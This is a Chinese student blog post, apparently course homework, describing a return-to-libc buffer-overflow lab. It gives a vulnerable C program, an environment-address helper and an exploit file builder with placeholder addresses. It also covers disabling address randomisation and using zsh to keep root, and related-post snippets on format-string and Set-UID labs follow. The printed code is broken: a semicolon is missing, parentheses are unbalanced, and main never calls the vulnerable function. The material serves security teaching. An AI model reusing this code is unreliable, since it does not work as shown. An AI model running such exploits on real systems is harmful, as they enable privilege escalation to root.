2021-2022-1 20212802《Linux内核原理与分析》第十二周作业

最新推荐文章于 2024-06-17 23:23:26 发布
最新推荐文章于 2024-06-17 23:23:26 发布
阅读量156 收藏
点赞数
分类专栏: Linux内核原理与分析 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ExNexus/article/details/121712329
版权

一 实验内容

  • return-to-libc实验是一个基于缓冲区溢出攻击实验的基础上的一种攻击实验
  • 缓冲区溢出攻击相关知识:
    • 原理:通过一段包含shellcode以及shellcode地址的长字符串注入到程序中,以shellcode地址来覆盖程序原有的返回地址,从而让目标程序来执行我们的shellcode,以此达到攻击目的
    • 保护措施:为了防止缓冲区溢出攻击,现在常用的保护措施有两种,一是设置堆栈不可执行,漏洞程序在执行注入到堆栈中的shellcode时就会发生程序崩溃。二是代码生成地址随机化,以此来使得攻击者无法准确得知shellcode的地址
  • return-to-libc攻击原理:
    • 为了避开堆栈不可执行的问题,return-to-libc攻击放弃了让漏洞程序执行堆栈中的shellcode,而是跳转到已经存在的代码(例如libc库中的system函数)来完成攻击

二 实验步骤

安装32位c语言程序编译器,sudo apt-get lib32z1 libc6-dev-i386sudo apt-get install lib32readline6-dev准备32位实验环境(本次实验在自己的虚拟机下完成)

在实际中为了防范缓冲区溢出等攻击,通常会降低shell程序的权限,即无法保持root权限,为了绕过这个问题,我们使用另一个shell程序,zsh来代替/bin/bash 。并且上面说过,现在为了防止代码的注入,操作系统对于代码所分配的堆栈地址都是随机的,这也不利于我们找到之后我们需要找到的/bin/sh``system函数``exit函数的地址完成地址注入,所以我们要事先关闭掉地址随机化

准备工作都完成之后,我们用以下三个程序来完成我们的攻击

一段包含缓冲区溢出漏洞,由于生成root shell的漏洞代码myretlib.c

/*myretlib.c*/

  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  int bof(FILE *badfile){
  	char buffer[12];
  	fread(buffer,sizeof(char),40,badfile);
  	return 1
  }
  
  int main(int argc, char **argv){
  	FILE *badfile;
  	badfile=fopen("badfile","r");
  	printf("returned properly\n");
  	fclose(badfile);
  	return 1;
  }

读取环境变量的程序getenvaddr.c

/*getenvaddr.c*/

  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  int main(int argc,char const *argv[]){
  	char *ptr;
  	if(argc < 3){
  		printf("usage : %s <enviroment var> <target program name>\n",argv[0]);
  		exit(0);
  	}
  	ptr=getenv(argv[1]);
  	ptr+=(strlen(argv[0]-strlen(argv[2]))*2;
  	printf("%s will be at %p\n",argv[1],ptr);
  	return 0;
  }

攻击用程序exploit.c将我们获得的/bin/shsystem函数exit函数的地址写进新的badfile中

/*exploit.c*/

  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  int main(int argc, char **argv){
  	char buf[40];
  	FILE *badfile;
  	badfile=fopen(".//badfile","w");
  	strcpy(buf, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");

  	*(long *) &buf[32] = 0x11111111; /*用以保存//bin//sh 的相关地址*/
  	*(long *) &buf[24] = 0x22222222; /*用以保存system函数的相关地址*/
  	*(long *) &buf[36] = 0x33333333; /*用以保存exit函数的相关地址*/

  	fwrite(buf, sizeof(buf), 1, badfile);
  	fclose(badfile);
  }

在完成编译后,我们首先通过读取环境变量的程序getenvaddr.c来获得BIN_SH的地址

 而一般程序中,都会跳转到系统已经存于内存中的函数systemexit所以我们通过设置断点来跟踪获得相应的地址,在strcpy函数处设置断点,继续运行

将我们获得的三个地址填入代码exploit.c中,删除badfile,重新编译

再次运行代码exploit时就会生成新的badfile,此时运行我们的漏洞程序myretlib输入命令whoami,可以看到我们拿到了root权限,即可见攻击成功

上面的实验实在/bin/sh指向zsh的情况下进行的,如果/bin/sh指向bash则上述的实验是获取不到root权限的,因为bash内置了权限降低的机制,虽然我们可以使得bof返回时执行system(“/bin/sh”);但是我们也获取不到root权限。

三 遇到的问题

一开始是在实验楼环境下实现这个实验,但是按照要求下载32位linux需要的库后,漏洞程序和攻击程序的编译仍然存在问题

感觉是虽然下载了相关库,但是并没有建立依赖,找了很多解决办法都没有搞定,最后尝试在自己的虚拟机上实验,发现可行。

ExNexus
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-2022-1 20212802Linux内核原理分析》第二作业
ExNexus的博客
10-02 417
总结:本的学习内容主要是庖丁解牛Linux的第一章,然后看完书后,又跟着云班课加深学习了一下第一章的内容。第一章主要讲述了linux里的汇编指令的一些指令,比如movl,pushl,popl等等,这些指令都是围绕数据结构中的栈做文章的。贯穿这一章的是esp、ebp,eip指针寄存器。简单来说,ebp就是指的栈底,esp就是指着栈顶。eip就是正在执行的指令所在的位置,然后不断重复的进行入栈出栈操作。 C语言代码: //mian.c int g(int x) {
2021-2022-1 20212810《Linux内核原理分析》第一作业
weixin_62167029的博客
09-26 179
实验一Linux 系统简介 Linux 就是一个操作系统,就像已经了解的 Windows(xp,7,8)和 Mac OS 。 如图,这是操作系统在整个计算机系统中的角色。 我们的 Linux 主要是系统调用和内核那两层。当然直观地看,我们使用的操作系统还包含一些在其上运行的应用程序,比如文本编辑器、浏览器、电子邮件等。 操作系统始于二十世纪五十年代,当时的操作系统能运行批处理程序。批处理程序不需要用户的交互,它从文件或者穿孔卡片读取数据,然后输出到另外一个文件或者打印机。 二十世纪六十年代初,
2021-2022-1 20212804《Linux内核原理分析第十二作业
weixin_57450190的博客
12-04 3391
Linux Capability探索实验 一、介绍 Linux内核从2.1版本开始,就开始支持Capabilities的安全机制。Capabilities安全机制提出的目的在于实现系统特权操作的更加细粒度的访问控制,使用户能够根据实际的安全需求来控制root进程拥有的权限范围,从而取消root进程多余权限带来的安全隐患。在Capabilities机制中,所有权限被分割成比较具体和细小的权限(并将分割出来的每种细小权限称为权能),每种权能代表着root用户进行某种特权操作的权限;系统中只有进程和可执行文件具有
2021-2022-1 20212810《Linux内核原理分析第十二作业
weixin_62167029的博客
12-08 527
Linux Capability探索实验 一.实验要求 1.感受到linux capability功能在访问控制上的优势 2.掌握使用Capability达到遵守最小权限原则的目的 3.分析linux中基于Capability访问控制的设计 二.实验过程 1.下载Libcap(准备内容) libcap 库能够使用户级别的程序与 capability 特性做交互,一些linux发行版不包括这个库,在环境中已经有 /usr/include/sys/capability.h 这个文件,为了避免老版本的影响,我们还
2021-2022-1 20212823 《Linux内核原理分析第十二作业
VVhisky的博客
12-08 532
缓冲区溢出漏洞实验 一、实验介绍 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。 (1)环境 实验楼提供的是 64 位 Ubuntu linux,而本次实验为了方便观察汇编语句,我们需要在 32 位环境下作操作,因此实验之前需要做一些准备。 sudo apt-get update sudo apt-get install -y lib32z1
2021-2022-1 20212824《Linux内核原理分析第十二作业
iuui11的博客
12-08 692
前置知识 格式化字符串漏洞是由像 printf(user_input) 这样的代码引起的,其中 user_input 是用户输入的数据,具有 Set-UID root 权限的这类程序在运行的时候,printf 语句将会变得非常危险,因为它可能会导致下面的结果: 使得程序崩溃 任意一块内存读取数据 修改任意一块内存里的数据 格式化字符串 printf ("The magic number is: %d", 1911); 如上 C 语言代码运行结果为 The magic number is: 1911 可以
2021-2022-1 20212815《Linux内核原理分析第十二作业
maslecen的博客
12-08 123
实验二:格式化字符串漏洞实验 实验原理:格式化字符串漏洞是由像 printf(user_input) 这样的代码引起的,其中 user_input 是用户输入的数据,具有 Set-UID root 权限的这类程序在运行的时候,printf 语句将会变得非常危险,因为它可能会导致下面的结果: • 使得程序崩溃 • 任意一块内存读取数据 • 修改任意一块内存里的数据 最后一种结果是非常危险的,因为它允许用户修改 set-UID root 程序内部变量的值,从而改变这些程序的行为 实验过程 1、在/home/sh
2021-2022-1 20212821《Linux内核原理分析第十二作业
weixin_45369229的博客
12-12 427
SET-UID程序漏洞实验 1.实验简介 Set-UID 是 Unix 系统中的一个重要的安全机制。当一个 Set-UID 程序运行的时候,它被假设为具有拥有者的权限。例如,如果程序的拥有者是root,那么任何人运行这个程序时都会获得程序拥有者的权限。Set-UID 允许我们做许多很有趣的事情,但不幸的是,它也是很多坏事情的罪魁祸首。 因此本次实验的目标有两点: 1.欣赏好的方面,理解为什么 Set-UID 是需要的,以及它是如何被执行的。 2.注意坏的方面,理解它潜在的安全性问题。 2.实验过程及结果 实
2021-2022-1 20212811《Linux内核原理分析》第十一作业
weixin_44311148的博客
12-04 389
格式化字符串漏洞实验 2.编译 可以添加以下参数关掉栈保护 gcc -z execstack -fno-stack-protector -o vul_prog vul_prog.c 3.增加权限 sudo chmod u+s vul_prog 二、找出 secret[1]的值 1.定位目标地址 运行 vul_prog 程序去定位 int_input 的位置,这样就确认了 %s 在格式字符串中的位置。 11和后面...
2021-2022-1 20212812《Linux内核原理分析第十二作业
sjy73的博客
12-08 1133
Linux系统监控实战 一、linux系统监控常用命令 top top 命令用于按一定的顺序显示所有正在运行而且处于活动状态的实时进程,而且会定期更新显示结果。这条命令显示了 CPU 的使用率、内存使用率、交换内存使用大小、高速缓存使用大小、缓冲区使用大小,进程 PID、所使用命令以及其他。它还可以显示正在运行进程的内存和 CPU 占用多的情况。top vmstat 用于显示虚拟内存、内核线程、磁盘、系统进程、I/O 块、中断、CPU 活动等的统计信息。 一般 vmstat 工具的使用是通过两个数字
边干边学Linux__第二版_doc格式
03-18
第12章 /proc文件系统 12.1 /proc文件系统 12.2 现有proc文件系统中各个文件的含义 12.3 怎样使用/proc文件系统 12.4 seq file 12.5 proc文件系统的内部实现机制 12.6 实验一:使用proc文件系统的一个简单例子 12.7 ...
入门学习Linux常用必会60个命令实例详解doc/txt
06-09
hda1中的“1”代表hda的第一个硬盘分区 (partition),hda2代表hda的第二主分区,第一个逻辑分区从hda5开始,依此类推。此外,可以直接检查 /var/log/messages文件,在该文件中可以找到计算机开机后系统已辨认出来的...
LINUX系统管理白皮书
09-18
第12章 电子邮件 120 12.1 何谓邮件消息 121 12.2 邮件如何发送 122 12.3 邮件地址 123 12.4 邮件路由的工作原理 124 12.4.1 因特网上的邮件路由 124 12.4.2 UUCP网络内的邮件路由 124 12.4.3 UUCP和RFC-822 ...
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装
最新发布
qq_43684686的博客
06-17 88
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装。重新执行安装程安装到 d:\a-vm。在D盘新建一个文件夹a-vm,
MVC 框架安全
A526847的博客
06-17 461
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
NTFS安全权限
2302_80097039的博客
06-12 757
NTFS权限是基于。
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 640
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
安全等保评测-什么是“等保“?
2401_84434570的博客
06-11 676
它旨在通过对信息和信息系统的安全性进行评估,发现并纠正存在的安全漏洞和隐患,提高信息系统的安全性和可靠性,保障信息的安全。等级保护测评是经公安部认证的具有资质的测评机构,依据国家信息安全等级保护规范规定,受有关单位委托,按照有关管理规范和技术标准,对信息系统安全等级保护状况进行检测评估的活动。进行现场调研和检测:对系统和数据进行现场调研和检测,了解系统和数据的安全状况和存在的问题。确定测评目标和范围:明确要测评的信息和信息系统的范围和目标,了解业务需求和安全需求。
linux-headers-5.15.0-72-generic 这个版本的linux内核头文件应该用什么
05-27
如果你正在运行的是 Linux 内核版本为 5.15.0-72-generic 的系统,那么你需要安装对应版本的 Linux 内核头文件才能编译内核模块或驱动程序。你可以使用以下命令来安装适用于该版本内核的头文件: ``` sudo apt-get install linux-headers-5.15.0-72-generic ``` 这个命令会自动安装与当前运行的内核版本相对应的头文件。 需要注意的是,如果你在编译内核模块或者驱动程序时,需要使用与当前运行的内核版本相同的头文件。如果你在编译期间使用了错误的头文件版本,可能会导致编译失败或者出现运行时错误。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值